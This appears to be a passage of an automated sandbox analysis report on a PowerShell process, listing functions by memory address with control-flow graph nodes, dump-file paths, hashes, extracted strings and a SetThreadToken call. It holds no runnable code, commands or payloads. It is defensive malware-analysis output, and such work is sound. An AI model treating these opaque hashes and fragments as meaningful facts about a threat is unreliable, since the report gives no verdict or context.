                                                                            • Instruction ID: a513cde870babb66ce70247c27c7569e8352a17b682c11f60372627e093370fa
                                                                            • Opcode Fuzzy Hash: a3e5ff8b582793651e6af90c8b6f884c216885c98537bc544cddba3b31eb1054
                                                                            • Instruction Fuzzy Hash: CD0128F161D3514FC32383284C141567BE6AFC3114B1B46A7D685EF657C9344C05C3A2

                                                                            Execution Graph

                                                                            Execution Coverage:6.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 22549 87b6890 22550 87b68d3 SetThreadToken 22549->22550 22551 87b6901 22550->22551

                                                                            Executed Functions

                                                                            Function 02EFB470 Relevance: .3, Instructions: 267COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 722 2efb470-2efb4a9 724 2efb4ae-2efb7e9 call 2efacbc 722->724 725 2efb4ab 722->725 786 2efb7ee-2efb7f5 724->786 725->724
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19b3c5a9687e57d5f1482d8f674319b5e05cad191ed4eefcdcfa8e513f599cba
                                                                            • Instruction ID: 26955a761780ce81ce5b19a3c91316bc753cd10adefd76d0f561bad92e9e2c26
                                                                            • Opcode Fuzzy Hash: 19b3c5a9687e57d5f1482d8f674319b5e05cad191ed4eefcdcfa8e513f599cba
                                                                            • Instruction Fuzzy Hash: 95916DB1E406155BDB16EBB489116AFBBF2EFC4700B40C92EE106AB354DF346E068BD5
                                                                            Function 02EFB490 Relevance: .3, Instructions: 252COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 787 2efb490-2efb4a9 788 2efb4ae-2efb7e9 call 2efacbc 787->788 789 2efb4ab 787->789 850 2efb7ee-2efb7f5 788->850 789->788
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 512803599abc4a9abadda616d68a36c40f9694ed1478853ea5265c6a80eb237f
                                                                            • Instruction ID: 2ba8f626fcea9e5d4c01918522e259646a370204f30b96d6b918fd739c5fc833
                                                                            • Opcode Fuzzy Hash: 512803599abc4a9abadda616d68a36c40f9694ed1478853ea5265c6a80eb237f
                                                                            • Instruction Fuzzy Hash: E7914DB0E406155BDB59EBB489116AFB7E3EFC4700B40C92DE116AB354DF346E068BC5
                                                                            Function 07642308 Relevance: 45.3, Strings: 35, Instructions: 1541COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,S l$,S l$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$pij$pij$pij$pij$pij$tPcq$tPcq$tPcq$tPcq$tPcq$tPcq$|,j$$cq$$cq$$cq$J!l$J!l$J!l$J!l$J!l$J!l$R l$R l$r l$r l
                                                                            • API String ID: 0-877334054
                                                                            • Opcode ID: 12b9c3099271ae1b6e84487bfe6af5012d5158968e1be8ba034f68a93c9bcb77
                                                                            • Instruction ID: 8349881eb2ff242ea3028bfa8a106d7c5ecedaf9ecea60e9adda517284d6bcdf
                                                                            • Opcode Fuzzy Hash: 12b9c3099271ae1b6e84487bfe6af5012d5158968e1be8ba034f68a93c9bcb77
                                                                            • Instruction Fuzzy Hash: CBB25DB1B142069FDB259B7984117AABBF2FF86310F24807AE906DB391DB35CD41C7A1
                                                                            Function 02EFE5B9 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 465 2efe5b9-2efe5c0 466 2efe622-2efe630 465->466 467 2efe5c2-2efe602 465->467 469 2efe693-2efe6b6 466->469 470 2efe632-2efe689 466->470 480 2efe6bc-2efe6d3 469->480 481 2efe73a-2efe753 469->481 470->469 486 2efe6db-2efe738 480->486 484 2efe75e 481->484 485 2efe755 481->485 487 2efe75f 484->487 485->484 486->480 486->481 487->487
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: 3477233401794598cc79f544fd7c4d06e8554062ab371d64a05c8ba929699e63
                                                                            • Instruction ID: a25314698d12c604775baa5f2dd993248731533f75612d1d09b96e1e95e98708
                                                                            • Opcode Fuzzy Hash: 3477233401794598cc79f544fd7c4d06e8554062ab371d64a05c8ba929699e63
                                                                            • Instruction Fuzzy Hash: 7041A970A016099FCB15DFA9E9646DDBBF2FF89304F5485A9E009EB391DB306D44CB90
                                                                            Function 02EFE610 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 495 2efe610-2efe630 497 2efe693-2efe6b6 495->497 498 2efe632-2efe689 495->498 505 2efe6bc-2efe6d3 497->505 506 2efe73a-2efe753 497->506 498->497 511 2efe6db-2efe738 505->511 509 2efe75e 506->509 510 2efe755 506->510 512 2efe75f 509->512 510->509 511->505 511->506 512->512
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: e7414abad1a2607edaea398b98bbf7669c2d6c4c58a5ad7169fcab703f2a793d
                                                                            • Instruction ID: 5461f106646fe047093fedc5d9e55c183c082f710936387f793091ab113b386d
                                                                            • Opcode Fuzzy Hash: e7414abad1a2607edaea398b98bbf7669c2d6c4c58a5ad7169fcab703f2a793d
                                                                            • Instruction Fuzzy Hash: 7541D970A016058FCB12DF69E9A4BDEBBF2FF49204F548569E006EB391DB30AC00CB90
                                                                            Function 02EFE640 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 520 2efe640-2efe6b6 527 2efe6bc-2efe6d3 520->527 528 2efe73a-2efe753 520->528 533 2efe6db-2efe738 527->533 531 2efe75e 528->531 532 2efe755 528->532 534 2efe75f 531->534 532->531 533->527 533->528 534->534
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: 510f5884d7b63c1f447435a2b5007136746ff0f9ee4087838bd17b29a422dd11
                                                                            • Instruction ID: 494d83f1138bbd98156edb19c9dac60167376113cb3c69eba12eadb0b5bbf647
                                                                            • Opcode Fuzzy Hash: 510f5884d7b63c1f447435a2b5007136746ff0f9ee4087838bd17b29a422dd11
                                                                            • Instruction Fuzzy Hash: 0B316770A416058FCB15DF69D594A9EBBF2FF88304F548928E41AAB390DB30BD44CB90
                                                                            Function 087B6889 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 542 87b6889-87b68cb 543 87b68d3-87b68ff SetThreadToken 542->543 544 87b6908-87b6925 543->544 545 87b6901-87b6907 543->545 545->544
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2158657264.00000000087B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_87b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3254676861-0
                                                                            • Opcode ID: c041f5196e7df3caee5af96ed9afe84fa8b4ad6f5f15c668fc0a744ea34dcd6f
                                                                            • Instruction ID: a993fae7f5bcb99d7a8dcf0d68c9be6993aba493a38b9d14d0be733683c99ee8
                                                                            • Opcode Fuzzy Hash: c041f5196e7df3caee5af96ed9afe84fa8b4ad6f5f15c668fc0a744ea34dcd6f
                                                                            • Instruction Fuzzy Hash: CE1113B59002488FCB10DF9AD984BDEFFF4EB98320F24846AD519A7310C7B4A944CFA0
                                                                            Function 087B6890 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 548 87b6890-87b68ff SetThreadToken 550 87b6908-87b6925 548->550 551 87b6901-87b6907 548->551 551->550
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2158657264.00000000087B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_87b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3254676861-0
                                                                            • Opcode ID: 81b883ea29c2fa3a54c3407d1567b1269ffc9e730503ae1d6687d76ca4c98a0d
                                                                            • Instruction ID: 551ed2c7dee83c7a44cd6ec7e9a008a19cfbca8b305332f35c2fb062fb7ca765
                                                                            • Opcode Fuzzy Hash: 81b883ea29c2fa3a54c3407d1567b1269ffc9e730503ae1d6687d76ca4c98a0d
                                                                            • Instruction Fuzzy Hash: ED11F2B59003498FCB10DF9AC984BDEFBF9EB98320F24842AD519A7310D774A944CFA1
                                                                            Function 02EF6FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 554 2ef6fc8-2ef6fe7 555 2ef70ed-2ef712b 554->555 556 2ef6fed-2ef6ff0 554->556 583 2ef6ff2 call 2ef767f 556->583 584 2ef6ff2 call 2ef7664 556->584 557 2ef6ff8-2ef700a 559 2ef700c 557->559 560 2ef7016-2ef702b 557->560 559->560 566 2ef70b6-2ef70cf 560->566 567 2ef7031-2ef7041 560->567 572 2ef70da 566->572 573 2ef70d1 566->573 568 2ef704d-2ef705b call 2efbf10 567->568 569 2ef7043 567->569 575 2ef7061-2ef7065 568->575 569->568 572->555 573->572 576 2ef7067-2ef7077 575->576 577 2ef70a5-2ef70b0 575->577 578 2ef7079-2ef7091 576->578 579 2ef7093-2ef709d 576->579 577->566 577->567 578->577 579->577 583->557 584->557
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (gq
                                                                            • API String ID: 0-1972435379
                                                                            • Opcode ID: 9f148ef16c7bfa8efc275ddbb63f64b7b533cd75242b2a4e1686ba33c866e50c
                                                                            • Instruction ID: 160044cc965c1570691f3d00ffb7eb9738a443b3c8081184fe0d251ab4fb7eeb
                                                                            • Opcode Fuzzy Hash: 9f148ef16c7bfa8efc275ddbb63f64b7b533cd75242b2a4e1686ba33c866e50c
                                                                            • Instruction Fuzzy Hash: C1416D34B402048FDB54DF68C564AAEBBF2EF8E315F149498E502AB391DB35DC41CB60
                                                                            Function 02EFAF98 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 606 2efaf98-2efafa1 call 2efa984 608 2efafa6-2efafaa 606->608 609 2efafac-2efafb9 608->609 610 2efafba-2efb055 608->610 617 2efb05e-2efb07b 610->617 618 2efb057-2efb05d 610->618 618->617
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (&cq
                                                                            • API String ID: 0-298851153
                                                                            • Opcode ID: 4d588c810e314e6219772fa55d9ee7bf7c6d8e2972d7ba962a18e75de12c0da3
                                                                            • Instruction ID: 6e17dd222759e368551c7d9f12c574381b0f92a0ff6d3aef6bd74e9d35ab6d99
                                                                            • Opcode Fuzzy Hash: 4d588c810e314e6219772fa55d9ee7bf7c6d8e2972d7ba962a18e75de12c0da3
                                                                            • Instruction Fuzzy Hash: 8421DE76A002588FCB14DBAED8006AEBBF6EF89320F14846AD518E7340CB7499058BE4
                                                                            Function 076417B8 Relevance: .3, Instructions: 340COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 621 76417b8-76417da 622 76417e0-76417e5 621->622 623 7641969-764198c 621->623 624 76417e7-76417ed 622->624 625 76417fd-7641801 622->625 635 76419c2-76419c8 623->635 636 764198e-76419b5 623->636 629 76417f1-76417fb 624->629 630 76417ef 624->630 626 7641914-764191e 625->626 627 7641807-764180b 625->627 631 7641920-7641929 626->631 632 764192c-7641932 626->632 633 764180d-764181e 627->633 634 764184b 627->634 629->625 630->625 643 7641934-7641936 632->643 644 7641938-7641944 632->644 633->623 655 7641824-7641829 633->655 637 764184d-764184f 634->637 641 76419cc-76419d6 635->641 642 76419ca 635->642 638 7641b04-7641b09 636->638 639 76419bb-76419c0 636->639 637->626 645 7641855-7641859 637->645 658 7641b0a-7641b20 638->658 639->635 646 76419d8-76419dc 639->646 641->646 642->646 647 7641946-7641966 643->647 644->647 645->626 649 764185f-7641863 645->649 653 7641ab4-7641abe 646->653 654 76419e2-76419e4 646->654 656 7641865-764186e 649->656 657 7641886 649->657 661 7641ac0-7641ac9 653->661 662 7641acc-7641ad2 653->662 659 76419f4 654->659 660 76419e6-76419f2 654->660 664 7641841-7641849 655->664 665 764182b-7641831 655->665 666 7641875-7641882 656->666 667 7641870-7641873 656->667 670 7641889-7641911 657->670 658->658 668 7641b22-7641b25 658->668 669 76419f6-76419f8 659->669 660->669 673 7641ad4-7641ad6 662->673 674 7641ad8-7641ae4 662->674 664->637 671 7641835-764183f 665->671 672 7641833 665->672 675 7641884 666->675 667->675 676 7641b27-7641b34 668->676 677 7641b60-7641b79 668->677 669->653 678 76419fe-7641a16 669->678 671->664 672->664 680 7641ae6-7641b01 673->680 674->680 675->670 682 7641b44 676->682 683 7641b36-7641b42 676->683 693 7641a30-7641a34 678->693 694 7641a18-7641a1e 678->694 689 7641b46-7641b48 682->689 683->689 691 7641b7c-7641b86 689->691 692 7641b4a-7641b50 689->692 697 7641b90-7641b96 691->697 698 7641b88-7641b8d 691->698 699 7641b52-7641b54 692->699 700 7641b5e 692->700 704 7641a3a-7641a41 693->704 701 7641a20 694->701 702 7641a22-7641a2e 694->702 705 7641b9c-7641ba8 697->705 706 7641b98-7641b9a 697->706 699->700 700->677 701->693 702->693 708 7641a43-7641a46 704->708 709 7641a48-7641aa5 704->709 710 7641baa-7641bc1 705->710 706->710 711 7641aaa-7641ab1 708->711 709->711
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f121dea09850f29418d1177e8001bc0c6f5afc14cfde596df64c765dd39eeb04
                                                                            • Instruction ID: c3fa4d28a2d7108f6175ba54ecec27227a772e0df77b2cec0c087d8843b1bb28
                                                                            • Opcode Fuzzy Hash: f121dea09850f29418d1177e8001bc0c6f5afc14cfde596df64c765dd39eeb04
                                                                            • Instruction Fuzzy Hash: 14B1E6B2B1421D9FCB199B79C8016AABBE6EF87210F14C06AD516CB352DB31DDC1C7A1
                                                                            Function 02EF29F0 Relevance: .2, Instructions: 221COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 851 2ef29f0-2ef2a1e 853 2ef2af5-2ef2b37 851->853 854 2ef2a24-2ef2a3a 851->854 861 2ef2b3d-2ef2b56 853->861 862 2ef2c51-2ef2c61 853->862 855 2ef2a3f-2ef2a52 854->855 856 2ef2a3c 854->856 855->853 860 2ef2a58-2ef2a65 855->860 856->855 863 2ef2a6a-2ef2a7c 860->863 864 2ef2a67 860->864 865 2ef2b5b-2ef2b69 861->865 866 2ef2b58 861->866 863->853 870 2ef2a7e-2ef2a88 863->870 864->863 865->862 871 2ef2b6f-2ef2b79 865->871 866->865 872 2ef2a8a-2ef2a8c 870->872 873 2ef2a96-2ef2aa6 870->873 874 2ef2b7b-2ef2b7d 871->874 875 2ef2b87-2ef2b94 871->875 872->873 873->853 877 2ef2aa8-2ef2ab2 873->877 874->875 875->862 876 2ef2b9a-2ef2baa 875->876 878 2ef2baf-2ef2bbd 876->878 879 2ef2bac 876->879 880 2ef2ab4-2ef2ab6 877->880 881 2ef2ac0-2ef2af4 877->881 878->862 884 2ef2bc3-2ef2bd3 878->884 879->878 880->881 886 2ef2bd8-2ef2be5 884->886 887 2ef2bd5 884->887 886->862 889 2ef2be7-2ef2bf7 886->889 887->886 890 2ef2bfc-2ef2c08 889->890 891 2ef2bf9 889->891 890->862 893 2ef2c0a-2ef2c24 890->893 891->890 894 2ef2c29 893->894 895 2ef2c26 893->895 896 2ef2c2e-2ef2c38 894->896 895->894 897 2ef2c3d-2ef2c50 896->897
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 629875d174e5b35f850d7d6803d1b07f020732f6a8e6301d2b0e9cfed5a3dca1
                                                                            • Instruction ID: 0f2642f19639f38fb5373f3e434b6efdc151a328c59408ae3b3ffcd5cb384dc8
                                                                            • Opcode Fuzzy Hash: 629875d174e5b35f850d7d6803d1b07f020732f6a8e6301d2b0e9cfed5a3dca1
                                                                            • Instruction Fuzzy Hash: 3A91A070A006098FCB15CF98C4D5AEEFBB1FF88314B248659DA55AB3A5C735EC51CB90
                                                                            Function 02EFBAB0 Relevance: .2, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c0aba447aedc0bbb9329d68afc0a16b193bb19b4b87a7100234cb1eeeb356556
                                                                            • Instruction ID: 0c90a2b58821c8cd306c5c2836f3e49fbb9af1c88ced05d057f1efedb5b428b3
                                                                            • Opcode Fuzzy Hash: c0aba447aedc0bbb9329d68afc0a16b193bb19b4b87a7100234cb1eeeb356556
                                                                            • Instruction Fuzzy Hash: 3B6146B1E012489FCB54CFA9C994ACEBFF1EF88314F14806AE909AB355EB309C45CB51
                                                                            Function 02EF7728 Relevance: .2, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f46b7710a0450a7e099a0d78ceaaf1f69a520468456abc36a87a5a6ca5bdead
                                                                            • Instruction ID: 606452bb774325313e56c9369fd3b96bb131c6af1d2124ade832f79978ac11dc
                                                                            • Opcode Fuzzy Hash: 8f46b7710a0450a7e099a0d78ceaaf1f69a520468456abc36a87a5a6ca5bdead
                                                                            • Instruction Fuzzy Hash: 1C51AD353042559FD754CB69D844A7ABBE6FFC9318F1584A9E609CB392EB31EC01CBA0
                                                                            Function 02EFBAC0 Relevance: .2, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56cb567b6db6aa18bde1c73b2cbaaa459525efc574872d4264dc4b682bec367a
                                                                            • Instruction ID: 556c12680d4cef7da3751bc29b6cf073295c6d80195249141b9cc76e96c4760c
                                                                            • Opcode Fuzzy Hash: 56cb567b6db6aa18bde1c73b2cbaaa459525efc574872d4264dc4b682bec367a
                                                                            • Instruction Fuzzy Hash: 9B612871E012489FCB54DFA9C984ADDFBF2EF88314F15816AE909AB354EB709C41CB50
                                                                            Function 02EFE419 Relevance: .1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ff16915b9b2464e7739841ab375e5ad323f9b78013ba2e2c11d54693c4d647c
                                                                            • Instruction ID: ca5a010c1ba1e4a68ad307ccfe73554909e1b552732d190664b9278aa492f09f
                                                                            • Opcode Fuzzy Hash: 2ff16915b9b2464e7739841ab375e5ad323f9b78013ba2e2c11d54693c4d647c
                                                                            • Instruction Fuzzy Hash: D1512FB47002058FCB50DF6CC594AAABBE6EF89314759C4A9E549CF362EB70EC05CB91
                                                                            Function 02EFE428 Relevance: .1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e7d69c97d07dfb1677d83509e2bde3b705efbae25a9898dfc9fa8619fc11d6e0
                                                                            • Instruction ID: 7f9b39c86d59d770f75663cf3add6b556b06ee264c8986c05f6058f0fdcd076b
                                                                            • Opcode Fuzzy Hash: e7d69c97d07dfb1677d83509e2bde3b705efbae25a9898dfc9fa8619fc11d6e0
                                                                            • Instruction Fuzzy Hash: CE412CB4B00205CFCB50DF6CC594A6ABBE6EF89314B19C469E549CB361EB70EC05CB91
                                                                            Function 02EF2B00 Relevance: .1, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23467c9641fda79886f46d004c7ba0d212afb56cdb96dbe93520b2d11923690c
                                                                            • Instruction ID: 26c27c48ca3879ffb0be4a097e31a4d7a3950ab1b270a87a9ade4ad59d689ea8
                                                                            • Opcode Fuzzy Hash: 23467c9641fda79886f46d004c7ba0d212afb56cdb96dbe93520b2d11923690c
                                                                            • Instruction Fuzzy Hash: 45411774A005059FCB05CF58C4D8AEAFBB1FF48314B659269DE59AB364C732EC51CBA0
                                                                            Function 02EFC388 Relevance: .1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9d41cf6773b9c3d3c051488eefa1158e1c32c57e23453707dd1cded7509e1d1
                                                                            • Instruction ID: a00cfdb9770e2238017a0a40cc4aa0bcd98977cd2dddf5ab462a4726f71fa05a
                                                                            • Opcode Fuzzy Hash: a9d41cf6773b9c3d3c051488eefa1158e1c32c57e23453707dd1cded7509e1d1
                                                                            • Instruction Fuzzy Hash: 1731BC313016019FC306EB78E854BAAB7A7EFC5354F10956AE64ACB361DF70AC45CB91
                                                                            Function 02EF6FB9 Relevance: .1, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed89b7a4a7500e0b6102ccbafec33736ce2f6901d407315df642ecf62d16032f
                                                                            • Instruction ID: 5eaf1fe2882e8b934eec888c5e5a5c3e7b664f900b40acdc306ca749f1dddbfb
                                                                            • Opcode Fuzzy Hash: ed89b7a4a7500e0b6102ccbafec33736ce2f6901d407315df642ecf62d16032f
                                                                            • Instruction Fuzzy Hash: 9C312D34A402058FDB14DF69C568AAABBF1EF8D315F1490A8E502AB791DB31EC41CB60
                                                                            Function 02EFAE60 Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19518b32e03e93cb8d7745da033dc2ee1ecd0caa97a49d42478aca3bc3771026
                                                                            • Instruction ID: f3166c0191d4ad07ccdc1812f3450493c99cd2b67911afa44dd475b022cf4616
                                                                            • Opcode Fuzzy Hash: 19518b32e03e93cb8d7745da033dc2ee1ecd0caa97a49d42478aca3bc3771026
                                                                            • Instruction Fuzzy Hash: 89316FB1A402099FDB48DFA9D4947AEBBF6EF88310F11D039E909EB750EB349C418B51
                                                                            Function 02EFAD28 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1d6dc6557c809bfbc1895a800054599346b35489c234582d30456e21090ddffd
                                                                            • Instruction ID: 06536e511e0b19658721ac3dc13f487cb5807c2039429642853c35d68d373e6e
                                                                            • Opcode Fuzzy Hash: 1d6dc6557c809bfbc1895a800054599346b35489c234582d30456e21090ddffd
